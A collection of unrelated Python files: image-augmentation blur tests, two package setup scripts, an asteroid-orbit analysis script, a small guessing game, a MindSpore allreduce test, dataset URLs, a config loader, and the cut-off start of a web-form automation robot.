matrices = [matrix_func(np.zeros((128, 128, 3), dtype=np.uint8), 3, ia.new_random_state(i)) for i in range(50)]
expected1 = np.float32([
[0, 1.0/3, 0],
[0, 1.0/3, 0],
[0, 1.0/3, 0]
])
expected2 = np.float32([
[0, 0, 0],
[1.0/3, 1.0/3, 1.0/3],
[0, 0, 0],
])
nb_seen = [0, 0]
for matrices_image in matrices:
assert np.allclose(matrices_image[0], matrices_image[1])
assert np.allclose(matrices_image[1], matrices_image[2])
for matrix_channel in matrices_image:
if np.allclose(matrix_channel, expected1):
nb_seen[0] += 1
elif np.allclose(matrix_channel, expected2):
nb_seen[1] += 1
assert nb_seen[0] > 0
assert nb_seen[1] > 0
# 5x5
aug = iaa.MotionBlur(k=5, angle=90, direction=0.0)
matrix_func = aug.matrix
matrices = [matrix_func(np.zeros((128, 128, 3), dtype=np.uint8), 3, ia.new_random_state(i)) for i in range(10)]
expected = np.float32([
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[1.0/5, 1.0/5, 1.0/5, 1.0/5, 1.0/5],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
])
for matrices_image in matrices:
for matrix_channel in matrices_image:
assert np.allclose(matrix_channel, expected)
# random k
aug = iaa.MotionBlur(k=[3, 5], angle=90, direction=0.0)
matrix_func = aug.matrix
matrices = [matrix_func(np.zeros((128, 128, 3), dtype=np.uint8), 3, ia.new_random_state(i)) for i in range(50)]
expected1 = np.float32([
[0, 0, 0],
[1.0/3, 1.0/3, 1.0/3],
[0, 0, 0],
])
expected2 = np.float32([
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[1.0/5, 1.0/5, 1.0/5, 1.0/5, 1.0/5],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
])
nb_seen = [0, 0]
for matrices_image in matrices:
assert np.allclose(matrices_image[0], matrices_image[1])
assert np.allclose(matrices_image[1], matrices_image[2])
for matrix_channel in matrices_image:
if matrix_channel.shape == expected1.shape and np.allclose(matrix_channel, expected1):
nb_seen[0] += 1
elif matrix_channel.shape == expected2.shape and np.allclose(matrix_channel, expected2):
nb_seen[1] += 1
assert nb_seen[0] > 0
assert nb_seen[1] > 0
# k with choice [a, b, c, ...] must error in case of non-discrete values
got_exception = False
try:
_ = iaa.MotionBlur(k=[3, 3.5, 4])
except Exception as exc:
assert "to only contain integer" in str(exc)
got_exception = True
assert got_exception
# no error in case of (a, b), checks for #215
aug = iaa.MotionBlur(k=(3, 7))
for _ in range(10):
_ = aug.augment_image(np.zeros((11, 11, 3), dtype=np.uint8))
# direction 1.0
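# direction=1.0 biases the weight toward one end of the line: the entries fall off
# linearly (1.0, 0.5, 0.0 before normalization) and are normalized to sum to 1,
# hence the 1.0/1.5, 0.5/1.5, 0.0/1.5 values below.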
aug = iaa.MotionBlur(k=3, angle=0, direction=1.0)
matrix_func = aug.matrix
matrices = [matrix_func(np.zeros((128, 128, 3), dtype=np.uint8), 3, ia.new_random_state(i)) for i in range(10)]
expected = np.float32([
[0, 1.0/1.5, 0],
[0, 0.5/1.5, 0],
[0, 0.0/1.5, 0]
])
for matrices_image in matrices:
for matrix_channel in matrices_image:
assert np.allclose(matrix_channel, expected, rtol=0, atol=1e-2)
# direction -1.0
aug = iaa.MotionBlur(k=3, angle=0, direction=-1.0)
matrix_func = aug.matrix
matrices = [matrix_func(np.zeros((128, 128, 3), dtype=np.uint8), 3, ia.new_random_state(i)) for i in range(10)]
expected = np.float32([
[0, 0.0/1.5, 0],
[0, 0.5/1.5, 0],
[0, 1.0/1.5, 0]
])
for matrices_image in matrices:
for matrix_channel in matrices_image:
assert np.allclose(matrix_channel, expected, rtol=0, atol=1e-2)
# random direction
aug = iaa.MotionBlur(k=3, angle=[0, 90], direction=[-1.0, 1.0])
matrix_func = aug.matrix
matrices = [matrix_func(np.zeros((128, 128, 3), dtype=np.uint8), 3, ia.new_random_state(i)) for i in range(50)]
expected1 = np.float32([
[0, 1.0/1.5, 0],
[0, 0.5/1.5, 0],
[0, 0.0/1.5, 0]
])
expected2 = np.float32([
[0, 0.0/1.5, 0],
[0, 0.5/1.5, 0],
[0, 1.0/1.5, 0]
])
nb_seen = [0, 0]
for matrices_image in matrices:
assert np.allclose(matrices_image[0], matrices_image[1])
assert np.allclose(matrices_image[1], matrices_image[2])
for matrix_channel in matrices_image:
if np.allclose(matrix_channel, expected1, rtol=0, atol=1e-2):
nb_seen[0] += 1
elif np.allclose(matrix_channel, expected2, rtol=0, atol=1e-2):
nb_seen[1] += 1
assert nb_seen[0] > 0
assert nb_seen[1] > 0
# test of actual augmenter
img = np.zeros((7, 7, 3), dtype=np.uint8)
img[3-1:3+2, 3-1:3+2, :] = 255
aug = iaa.MotionBlur(k=3, angle=90, direction=0.0)
img_aug = aug.augment_image(img)
v1 = (255*(1/3))
v2 = (255*(1/3)) * 2
v3 = (255*(1/3)) * 3
expected = np.float32([
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, v1, v2, v3, v2, v1, 0],
[0, v1, v2, v3, v2, v1, 0],
[0, v1, v2, v3, v2, v1, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0]
]).astype(np.uint8)
expected = np.tile(expected[..., np.newaxis], (1, 1, 3))
assert np.allclose(img_aug, expected)
if __name__ == "__main__":
main()
|
import sys
from setuptools import setup, find_packages
install_requires = [
'boto3>=1.2.3,<2.0',
'clint>0.5,<1.0',
'PyYAML>=3,<4.0',
'troposphere==2.0',
'Jinja2>=2.8,<3.0',
'six>1.9,<2.0'
]
# As of Python 2.7, the argparse module is part of the standard library.
if sys.version_info < (2, 7):
install_requires.append('argparse>=1.1.0')
setup(
name='gordon',
version='0.7.0',
url='https://github.com/ZextrasGiacomoMattiuzzi/gordon',
license='BSD',
author='Jorge Bastida',
author_email='me@jorgebastida.com',
description='Gordon is a tool to create, wire and deploy AWS Lambdas using CloudFormation',
keywords="aws lambda apigateway kinesis dynamodb s3 cloudwatch",
packages=find_packages(),
platforms='any',
install_requires=install_requires,
test_suite='nose.collector',
classifiers=[
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 2',
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Topic :: Utilities'
],
entry_points={
'console_scripts': [
'gordon = gordon.bin:main',
]
},
include_package_data=True,
zip_safe=False,
use_2to3=True
)
|
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
import seaborn as sns
target = '1kB'
radeg = np.pi/180
def cart_to_pol(x,y):
r = np.sqrt(x**2 + y**2)
phi = np.arctan2(y,x)
return r, phi
def pol_to_cart(r,phi):
x = r*np.cos(phi)
y = r*np.sin(phi)
return x, y
def L45(msun,mjup):
u2 = mjup/(msun+mjup)
x_L4 = 0.5 - u2
x_L5 = x_L4
y_L4 = np.sqrt(3)/2
y_L5 = -y_L4
return np.array([x_L4,x_L5]), np.array([y_L4,y_L5])
def L45_nonnorm(xjup,yjup,xsun,ysun):
phi_jup = np.arctan2(yjup,xjup)
phi_L4 = phi_jup + np.pi/3
phi_L5 = phi_jup - np.pi/3
xsep = (xsun - xjup)
ysep = (ysun - yjup)
r_jupsol = np.sqrt(xsep**2 + ysep**2)
x_L4 = r_jupsol*np.cos(phi_L4)
x_L5 = r_jupsol*np.cos(phi_L5)
y_L4 = r_jupsol*np.sin(phi_L4)
y_L5 = r_jupsol*np.sin(phi_L5)
return np.array([x_L4,x_L5]), np.array([y_L4,y_L5])
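# Hill radius at perihelion, r_H = a*(1 - e)*(m/(3M))^(1/3): the approximate region
# in which the planet's gravity dominates over the star's tidal field.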
def hill(a,e,m,M):
return a*(1-e)*np.power(m/(3*M),1/3)
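# r_pol evaluates a dimensionless effective (Jacobi-like) potential of the circular
# restricted three-body problem on a polar (r, psi) grid, with mass ratio q = M2/M1
# and the coordinates scaled by the separation a.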
def r_pol(r,psi,M1,M2,a):
q = M2/M1
z = np.zeros((len(psi),len(r)))
for i, phi in enumerate(psi):
x_ = r*np.cos(phi)
y_ = r*np.sin(phi)
x = x_/a
y = y_/a
s1 = np.sqrt(x**2 + y**2)
s2 = np.sqrt((x-1)**2 + y**2)
term1 = 2/(s1*(1+q))
term2 = 2*q/(s2*(1+q))
term3 = (x - q/(1+q))**2
term4 = y**2
z[i] = term1 + term2 + term3 + term4
return z
ast_d = np.load('{0}_Trojandata.npy'.format(target))
num_asts = len(ast_d[0,:,0])
print(ast_d.shape)
jup_d = np.load('{0}_Planetdata.npy'.format(target))
sol_d = np.load('{0}_Stardata.npy'.format(target))
times = np.load('{0}_Timesteps.npy'.format(target))
ast_a = ast_d[0]; ast_e = ast_d[1]; ast_i = ast_d[2]
ast_o = ast_d[3]; ast_p = ast_d[4]; ast_l = ast_d[5]
ast_x = ast_d[6]; ast_y = ast_d[7]; ast_z = ast_d[8]
ast_meda = np.median(ast_a,axis=0)
jup_a = jup_d[0]; jup_e = jup_d[1]; jup_i = jup_d[2]; jup_p = jup_d[3]
jup_l = jup_d[4]; jup_x = jup_d[5]; jup_y = jup_d[6]; jup_z = jup_d[7]
sol_m = sol_d[0]; sol_l = sol_d[1]; sol_x = sol_d[2]; sol_y = sol_d[3]; sol_z = sol_d[4]
jhill = hill(jup_a,jup_e,9.546e-4,sol_m)
dst_jall = np.sqrt((ast_x - jup_x)**2 + (ast_y - jup_y)**2)
L45x, L45y = L45_nonnorm(jup_x,jup_y,sol_x,sol_y)
L4_xs = L45x[0]; L4_ys = L45y[0]
L5_xs = L45x[1]; L5_ys = L45y[1]
i_dif = np.zeros_like(ast_i)
i_int = ast_i[:,0]
for i in range(len(ast_a[0,:])):
i_dif[:,i] = ast_i[:,i] - i_int
phi_vals = np.linspace(-np.pi,np.pi,500)
Z = r_pol(jup_a,phi_vals,sol_m,9.546e-4,jup_a)
Pot = np.flip(Z,1)
ast_r, ast_h = cart_to_pol(ast_x,ast_y)
jup_r, jup_h = cart_to_pol(jup_x,jup_y)
phdif = np.zeros_like(ast_h)
for i in range(len(jup_h)):
phdif[:,i] = ast_h[:,i] - jup_h[i]
id4 = []
id5 = []
for i in range(num_asts):
for it in range(len(jup_h)):
if phdif[i,it] < -np.pi:
phdif[i,it] = phdif[i,it] + 2*np.pi
if phdif[i,it] > np.pi:
phdif[i,it] = phdif[i,it] - 2*np.pi
if phdif[i,0] > 0:
id4.append(i)
if phdif[i,0] < 0:
id5.append(i)
print('Percentage at L4: %2.1f' %(len(id4)*100/num_asts))
liba = np.zeros((num_asts,200))
libp = np.zeros((num_asts,200))
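# Estimate libration amplitudes in windows of 500 output steps: the phase-angle
# amplitude is measured about +/- pi/3 (the L4/L5 points) and the semi-major-axis
# amplitude about the planet's median a over the same window.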
for i in range(num_asts):
for n in range(200):
high = int(500*(n+1))
loww = int(500*n)
pmax = np.amax(phdif[i,loww:high])
pmin = np.amin(phdif[i,loww:high])
amax = np.amax(ast_a[i,loww:high])
amin = np.amin(ast_a[i,loww:high])
amid = np.median(jup_a[loww:high])
if pmax > 0:
mid = np.pi/3
if pmax < 0:
mid = -np.pi/3
lip = ((pmax - mid) + (pmin - mid)) / 2
lia = ((amax - amid)+(amin - amid)) / 2
libp[i,n] = abs(lip)
liba[i,n] = abs(lia)
indices = []
hillers = []
for i in range(num_asts):
it = 0
while it < len(ast_meda):
a_focus = ast_a[i,it]
a_media = ast_meda[it]
if a_focus > a_media + 2:
indices.append(i)
break
elif a_focus < a_media - 2:
indices.append(i)
break
else:
it += 1
it = 0
while it < len(jhill):
d = dst_jall[i,it]
h = jhill[it]
if d <= h + 0.1:
hillers.append(i)
break
else:
it += 1
idx = np.array(indices)
hdx = np.array(hillers)
hill_not_sma = np.array(list(set(hillers) - set(indices)))
ndx = np.array(list(set(range(num_asts)) - set(indices)))
print("Number of escapers: ", len(indices))
print("Number of hill crossers: ", len(hillers))
pct = len(indices)/num_asts
print('Pct escaped / Total Asts: %0.2f' %pct)
nrm_a = ast_a[ndx]; nrm_e = ast_e[ndx]; nrm_i = ast_i[ndx]; ndifi = i_dif[ndx]; nrmla = liba[ndx]
nrm_p = ast_p[ndx]; nrm_l = ast_l[ndx]; nrm_x = ast_x[ndx]; nrm_y = ast_y[ndx]; nrmlp = libp[ndx]
odd_a = ast_a[idx]; odd_e = ast_e[idx]; odd_i = ast_i[idx]; odifi = i_dif[idx]; oddla = liba[idx]
odd_p = ast_p[idx]; odd_l = ast_l[idx]; odd_x = ast_x[idx]; odd_y = ast_y[idx]; oddlp = libp[idx]
nrm_r, nrmph = cart_to_pol(nrm_x,nrm_y); odd_r, oddph = cart_to_pol(odd_x,odd_y)
jup_r, jupph = cart_to_pol(jup_x,jup_y); sol_r, solph = cart_to_pol(sol_x,sol_y)
L4_rs, L4phs = cart_to_pol(L4_xs,L4_ys); L5_rs, L5phs = cart_to_pol(L5_xs,L5_ys)
distj = np.sqrt((odd_x - jup_x)**2 + (odd_y - jup_y)**2)
disth = np.sqrt((ast_x[hdx] - jup_x)**2 + (ast_y[hdx] - jup_y)**2)
dists = np.sqrt((odd_x - sol_x)**2 + (odd_y - sol_y)**2)
jdist = np.sqrt((jup_x - sol_x)**2 + (jup_y - sol_y)**2)
earlies = []
laties = []
hill_cross = np.zeros(len(hdx))
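# Classify escapers by when they first leave the +/- 2 AU band around the median
# asteroid semi-major axis: before output step 33333 (~0.67 Myr) -> 'earlies',
# after step 70000 -> 'laties'; also record the first step at which each
# Hill-crosser comes within the planet's Hill radius.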
for i in range(len(odd_a)):
it = 0
while it < 100000:
a_focus = odd_a[i,it]
a_media = ast_meda[it]
if a_focus > a_media + 2:
if it < 33333:
earlies.append(i)
break
elif it > 70000:
laties.append(i)
break
else:
break
elif a_focus < a_media - 2:
if it < 33333:
earlies.append(i)
break
elif it > 70000:
laties.append(i)
break
else:
break
else:
it += 1
for i in range(len(hdx)):
it = 0
while it < 100000:
d = disth[i,it]
h = jhill[it]
if d <= h:
hill_cross[i] = it
break
else:
it += 1
horses = []
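# Among the escapers, flag orbits whose phase offset from the planet reaches
# +/- 170 deg or passes within +/- 5 deg during the first 5000 steps as
# horseshoe-like ('horses'); the remaining escapers ('trs') are treated as
# tadpole librators.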
for number,n in enumerate(idx):
i = 0
while i < 5000:
val = phdif[n,i]
if 170*radeg <= val:
horses.append(n)
break
elif val <= -170*radeg:
horses.append(n)
break
elif -5*radeg <= val <= 5*radeg:
horses.append(n)
break
i += 1
hrs = np.array(horses)
trs = np.array( list( set(idx) - set(horses) ) )
edx = np.array(earlies)
ldx = np.array(laties)
print("Number of early escapees: ", len(earlies), " (escaped before .67 Myr)")
print("Number of late escapees: ", len(laties), " (escaped after %1.2f Myr)" %(times[70000]/1e6))
pct_e = len(earlies)/len(indices)
pct_l = len(laties)/len(indices)
print('Number early / Total escapees: %0.2f' %pct_e)
print('Number late / Total escapees: %0.2f' %pct_l)
pcT_e = len(earlies)/num_asts
pcT_l = len(laties)/num_asts
print('Number early / Total Asts.: %0.2f' %pcT_e)
print('Number late / Total Asts.: %0.2f' %pcT_l)
x_axis = np.linspace(0,times[33333]/1e6)
x_axi2 = np.linspace(times[70000]/1e6,times[-1]/1e6)
fig, ax = plt.subplots(3,figsize=(14,13),sharex=True,gridspec_kw={'height_ratios': [3, 1, .75]})
plt.subplots_adjust(hspace=0)
ax[0].plot(times/1e6,ast_meda,'k',lw=3)
ax[0].vlines([times[33333]/1e6,times[70000]/1e6],5,9.5,'b',alpha=0.8,zorder=0)
ax[0].fill_between(x_axis,5*np.ones_like(x_axis),9.5*np.ones_like(x_axis),facecolor='b',alpha=0.2,zorder=0)
ax[0].fill_between(x_axi2,5*np.ones_like(x_axis),9.5*np.ones_like(x_axis),facecolor='b',alpha=0.2,zorder=0)
ax[0].plot(times/1e6,jup_a,'gold',lw=3)
ax[0].legend(['Median Ast.','Planet'],fontsize=16,frameon=False,loc='upper left')
ax[0].set_ylabel('Semimajor Axis / AU',fontsize=16)
ax[0].set_ylim(5,9.5)
ax[0].set_xlim(0,2)
ax[0].text(0.18,7.25,"%1.i escaped" %len(earlies),fontsize=25)
ax[0].text(0.8,7.25,"%2.i escaped" %(len(indices) - len(earlies) - len(laties)),fontsize=25)
ax[0].text(1.48,7.25,"%2.i escaped" %len(laties),fontsize=25)
ax[1].plot(times/1e6,sol_l,'orange',lw=3,zorder=10)
ax[1].plot(times/1e6,sol_m,'g',ls=':',lw=3,zorder=10)
ax[1].vlines([times[33333]/1e6,times[70000]/1e6],0,4,'b',alpha=0.8,zorder=0)
ax[1].legend(["log Stellar Luminosity", "Stellar Mass"],fontsize=16,loc='center left',frameon=False)
ax[1].set_ylabel("Solar Units",fontsize=16)
ax[1].set_ylim(0,4)
ax[1].fill_between(x_axis,0*np.ones_like(x_axis),4*np.ones_like(x_axis),facecolor='b',alpha=0.2,zorder=0)
ax[1].fill_between(x_axi2,0*np.ones_like(x_axis),4*np.ones_like(x_axis),facecolor='b',alpha=0.2,zorder=0)
ax[1].set_xlabel('Time / Myr',fontsize=16)
ax[1].set_yticks([0,1,2,3])
ax[2].hist(hill_cross*20/1e6,edgecolor='k',facecolor='k',alpha=0.5,range=[0,2],bins=20)
ax[2].set_ylabel("Escapes",fontsize=16)
ax[2].set_xlabel("Time / Myr",fontsize=16)
ax[2].set_ylim(0,35)
ax[2].set_yticks([0,10,20,30])
fig.savefig('{0}_Timeseries.pdf'.format(target),dpi=300)
############
hist, axh = plt.subplots(1,4,figsize=(20,5))
axh[0].hist(nrm_a[:,0],edgecolor='k',histtype='step',range=[4.95,5.45])
axh[0].hist(odd_a[:,0],facecolor='r',alpha=0.7,range=[4.95,5.45])
axh[0].set_xlabel("SMA (AU)",fontsize=16)
axh[0].set_xlim(4.95,5.45)
axh[1].hist(nrm_e[:,0],edgecolor='k',histtype='step',range=[0,.25])
axh[1].hist(odd_e[:,0],facecolor='r',alpha=0.7,range=[0,.25])
axh[1].set_xlabel("Eccentricity",fontsize=16)
axh[1].set_xlim(0,0.25)
axh[2].hist(abs(nrmla[:,0]),edgecolor='k',histtype='step',range=[0,0.02],bins=20)
axh[2].hist(abs(liba[trs,0]),facecolor='r',alpha=0.7,range=[0,0.02],bins=20)
axh[2].set_xlabel("SMA Libration Amp. (AU)",fontsize=16)
axh[2].set_xlim(0,.02)
axh[2].set_xticks([0,0.005,0.01,0.015,0.02])
radeg = np.pi/180
axh[3].hist(abs(nrmlp[:,0])/radeg,edgecolor='k',histtype='step',range=[0,35])
axh[3].hist(abs(libp[trs,0])/radeg,facecolor='r',alpha=0.7,range=[0,35])
axh[3].set_xlabel(r"$\lambda$ Libration Amplitude (Deg.)",fontsize=16)
axh[3].set_xlim(0,35)
axh[3].legend(labels=['Stable','Escaped'],fontsize=14,frameon=False,loc='upper right')
hist.suptitle('Initial conditions',fontsize=18)
hist.savefig('{0}_Histograms.pdf'.format(target),dpi=300)
#############
orf, ora = plt.subplots(1,2,figsize=(15,5),gridspec_kw={'width_ratios': [2, 1]})
for i in range(len(ndx)):
ora[0].plot(phdif[ndx[i],:500],ast_a[ndx[i],:500]/5.2,'k',alpha=0.01,zorder=5)
for i,tr in enumerate(trs):
ora[0].plot(phdif[tr,:500],ast_a[tr,:500]/5.2,'r',alpha=0.05,zorder=10)
ora[0].set_xlim(-np.pi,np.pi)
ora[0].set_ylim(.9,1.1)
ora[0].set_xlabel(r"$\phi - \phi_{jup}$",fontsize=16)
ora[0].set_ylabel(r"SMA / $a_{jup}$",fontsize=16)
ora[0].vlines([-np.pi/3,np.pi/3],0.9,1.1,ls='--',zorder=0)
ora[0].set_xticks([-np.pi,-np.pi/2,-np.pi/3,0,np.pi/3,np.pi/2,np.pi])
ora[0].set_xticklabels([r"-$\pi$",r"-$\pi$/2",r"$L_5$",'0',r"$L_4$",r"$\pi$/2",r"$\pi$"])
sns.kdeplot(abs(nrmlp[:,0])/radeg,nrmla[:,0],shade=True,shade_lowest=None,cmap='Greys',levels=5,alpha=0.5)
sns.kdeplot(abs(libp[trs,0])/radeg,liba[trs,0],shade=True,shade_lowest=None,cmap='Reds',levels=5,alpha=0.5)
ora[1].set_ylabel("Init. SMA Libration (AU)",fontsize=16)
ora[1].set_xlabel(r"Init. $\lambda$ Libration (Deg.)",fontsize=16)
ora[1].set_xlim(0,35)
orf.tight_layout()
orf.savefig('{0}_Orbits.pdf'.format(target),dpi=300)
#############
norm = mpl.colors.Normalize(vmin=0.005, vmax=0.015, clip=False)
tim, tax = plt.subplots(figsize=(7,6))
scatter = tax.scatter(abs(libp[hdx,0])/radeg,hill_cross*20/1e6,c=abs(liba[hdx,0]),cmap='Reds',norm=norm)
tax.set_xlim(0,35)
tax.set_xlabel(r"Initial $\lambda$ Libration (Deg.)",fontsize=16)
tax.set_ylabel('Time of Encounter (Myr)',fontsize=16)
tim.colorbar(scatter, label='Initial SMA Libration (AU)')
tax.set_ylim(0,2)
tim.savefig('{0}_Eject_Perts.pdf'.format(target),dpi=300)
######################
hill_data = np.array((hdx,hill_cross))
np.save('{0}_Ejects.npy'.format(target), idx)
np.save('{0}_Hillcr.npy'.format(target), hill_data)
|
import codecs
import os
import re
from setuptools import find_packages, setup
###############################################################################
# Using setup.py from Attrs as a template for finding components, awesome config.
# Original reference: https://github.com/python-attrs/attrs/blob/master/setup.py
NAME = "mutatest"
PACKAGES = find_packages()
META_PATH = os.path.join("mutatest", "__init__.py")
KEYWORDS = ["mutatest", "mutation", "testing", "test", "mutant", "mutate", "pytest"]
PROJECT_URLS = {
"Documentation": "https://mutatest.readthedocs.io/",
"Bug Tracker": "https://github.com/EvanKepner/mutatest/issues",
"Source Code": "https://github.com/EvanKepner/mutatest",
}
CLASSIFIERS = [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Natural Language :: English",
"Environment :: Console",
"Framework :: Pytest",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3 :: Only",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Software Development :: Quality Assurance",
"Topic :: Software Development :: Testing",
"Topic :: Software Development :: Testing :: Unit",
]
# Built to run with pytest, but not an installation requirement for the API
INSTALL_REQUIRES = ["coverage>=4.4"]
EXTRAS_REQUIRE = {
"docs": ["coverage", "ipython", "sphinx"], # kept in docs/requirements.txt for RTD
"tests": [
"pytest >= 4.0.0",
"freezegun",
"coverage",
"pytest-cov",
"pytest-xdist",
"tox",
"virtualenv",
"hypothesis",
],
"qa": ["mypy", "black", "pre-commit", "isort"],
}
EXTRAS_REQUIRE["dev"] = EXTRAS_REQUIRE["tests"] + EXTRAS_REQUIRE["docs"] + EXTRAS_REQUIRE["qa"]
HERE = os.path.abspath(os.path.dirname(__file__))
def read(*parts):
"""
Build an absolute path from *parts* and return the contents of the
resulting file. Assume UTF-8 encoding.
"""
with codecs.open(os.path.join(HERE, *parts), "rb", "utf-8") as f:
return f.read()
META_FILE = read(META_PATH)
def find_meta(meta):
"""
Extract __*meta*__ from META_FILE.
"""
meta_match = re.search(r"^__{meta}__ = ['\"]([^'\"]*)['\"]".format(meta=meta), META_FILE, re.M)
if meta_match:
return meta_match.group(1)
raise RuntimeError("Unable to find __{meta}__ string.".format(meta=meta))
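# Example: find_meta("version") returns the value assigned to __version__ in
# mutatest/__init__.py, and raises RuntimeError if that dunder is missing.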
VERSION = find_meta("version")
URL = find_meta("url")
LONG = "\n\n".join([read("README.rst"), read("CHANGELOG.rst"), read("AUTHORS.rst")])
if __name__ == "__main__":
setup(
name=NAME,
description=find_meta("description"),
license=find_meta("license"),
url=URL,
project_urls=PROJECT_URLS,
version=VERSION,
author=find_meta("author"),
author_email=find_meta("email"),
maintainer=find_meta("author"),
keywords=KEYWORDS,
long_description=LONG,
packages=PACKAGES,
python_requires=">=3.7.0",
zip_safe=False,
entry_points={"console_scripts": ["mutatest=mutatest.cli:cli_main"]},
classifiers=CLASSIFIERS,
install_requires=INSTALL_REQUIRES,
extras_require=EXTRAS_REQUIRE,
include_package_data=True,
)
|
from random import randint
from os import system
c = 0
# Clear the screen
system('cls')
print('=-'*20)
print('VAMOS JOGAR PAR OU IMPAR')
print('=-'*20)
# Main program loop
while True:
n = int(input('Diga um valor: '))
computador = randint (0, 10)
while True:
decisao = str(input('Par ou impar [P/I] ')).upper()
if decisao in 'PI':
break
else:
print('Por favor escolha par ou impar')
if (n + computador) % 2 == 0:
print('-'*40)
print(f'Voce jogou {n} e o computador {computador}. Total {n+computador} deu PAR')
if decisao == 'P':
print('=-'*20)
print('Voce venceu')
c += 1
elif decisao == 'I':
print('Voce perdeu')
print('=-'*20)
print(f'GAME OVER! Voce venceu {c} vezes')
break
else:
print('-'*40)
print(f'Voce jogou {n} e o computador {computador}. Total {n+computador} deu IMPAR')
print('-'*40)
if decisao == 'I':
print('=-'*20)
print('Voce venceu')
c += 1
elif decisao == 'P':
print('Voce perdeu')
print('=-'*20)
print(f'GAME OVER! Voce venceu {c} vezes')
break
print('='*20)
# ORIGINAL SOLUTION WITH 28 LINES
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""test hccl allreduce performance with 8p"""
import os
from multiprocessing import Process, Queue
import pytest
import numpy as np
import mindspore.nn as nn
from mindspore import Tensor
from mindspore import dtype as mstype
from mindspore.ops import operations as P
import mindspore.communication.management as D
from mindspore import context
from mindspore.context import ParallelMode
MINDSPORE_HCCL_CONFIG_PATH = "/home/workspace/mindspore_config/hccl/rank_table_8p.json"
np.random.seed(1)
os.environ['GLOG_v'] = str(2)
class AllReduceNet(nn.Cell):
def __init__(self):
super(AllReduceNet, self).__init__()
self.mul = P.Mul()
self.all_reduce = P.AllReduce()
self.add = P.Add()
def construct(self, x):
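# With an all-ones (3, 4) input on 8 devices: 1*2 + 2 = 4, allreduce -> 32,
# 32 - 16 = 16, allreduce -> 128, 128*2 = 256, matching expect_output below.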
x = self.mul(x, 2)
y1 = Tensor(np.array([[2, 2, 2, 2], [2, 2, 2, 2], [2, 2, 2, 2]])).astype(np.float32)
z = self.add(x, y1)
z = self.all_reduce(z)
y2 = Tensor(np.array([[-16, -16, -16, -16], [-16, -16, -16, -16], [-16, -16, -16, -16]])).astype(np.float32)
out = self.add(z, y2)
out = self.all_reduce(out)
out = self.mul(out, 2)
return out
def train_allreduce_8p(q, device_id, device_num):
os.system("mkdir " + str(device_id))
os.chdir(str(device_id))
context.set_context(mode=context.PYNATIVE_MODE, device_target="Ascend", device_id=device_id)
os.environ['MINDSPORE_HCCL_CONFIG_PATH'] = MINDSPORE_HCCL_CONFIG_PATH
os.environ['RANK_ID'] = str(device_id)
os.environ['RANK_SIZE'] = str(device_num)
D.init()
context.reset_auto_parallel_context()
context.set_auto_parallel_context(parallel_mode=ParallelMode.DATA_PARALLEL, gradients_mean=False,
device_num=device_num)
net = AllReduceNet()
input_x = np.ones([3, 4]).astype(np.float32)
output = net(Tensor(input_x, mstype.float32))
q.put(output)
@pytest.mark.level0
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_ascend_training
@pytest.mark.env_single
def test_pynative_hccl_allreduce_8p():
device_num = 8
process = []
q = Queue()
for i in range(device_num):
device_id = i
process.append(Process(target=train_allreduce_8p, args=(q, device_id, device_num)))
for i in range(device_num):
process[i].start()
print("Waiting for all subprocesses done...")
for i in range(device_num):
process[i].join()
# check result
for i in range(device_num):
expect_output = [[256, 256, 256, 256], [256, 256, 256, 256], [256, 256, 256, 256]]
assert not q.empty()
output = Tensor(q.get())
assert np.allclose(output.asnumpy(), expect_output)
for i in range(device_num):
os.system("rm -rf " + str(i))
print("End training...")
|
# Directly download tasks whose nlp format differs from the original dataset
SQUAD_TASKS = {"squad_v1", "squad_v2"}
DIRECT_DOWNLOAD_TASKS_TO_DATA_URLS = {
"wsc": f"https://dl.fbaipublicfiles.com/glue/superglue/data/v2/WSC.zip",
"multirc": f"https://dl.fbaipublicfiles.com/glue/superglue/data/v2/MultiRC.zip",
"record": f"https://dl.fbaipublicfiles.com/glue/superglue/data/v2/ReCoRD.zip",
}
DIRECT_DOWNLOAD_TASKS = DIRECT_DOWNLOAD_TASKS_TO_DATA_URLS.keys()
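# Hypothetical usage sketch: a download step could branch on membership, e.g.
#   if task_name in DIRECT_DOWNLOAD_TASKS:
#       url = DIRECT_DOWNLOAD_TASKS_TO_DATA_URLS[task_name]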
|
import json
from types import SimpleNamespace
with open('./config/config.json') as json_file:
data = json.load(json_file, object_hook=lambda d: SimpleNamespace(**d))
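# The object_hook converts every decoded JSON object into a SimpleNamespace, so
# values can be read with attribute access (e.g. data.debug instead of
# data["debug"], assuming the config file defines a "debug" key).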
|
# Robot to enter weekly sales data into the RobotSpareBin Industries Intranet.
import os
from Browser import Browser
from Browser.utils.data_types import SelectAttribute
from RPA.Excel.Files import Files
from RPA.HTTP import HTTP
from RPA.PDF import PDF
browser = Browser()
def open_the_intranet_website():
browser.new_page("https://robotsparebinindustries.com/")
def log_in():
browser.type_text("css=#username", "maria")
browser.type_secret("css=#password", "thoushallnotpass")
browser.click("text=Log in")
def download_the_excel_file():
http = HTTP()
http.download(
url="https://robotsparebinindustries.com/SalesData.xlsx",
overwrite=True)
def fill_and_submit_the_form_for_one_person(sales_rep):
browser.type_text("css=#firstname", sales_rep["First Name"])
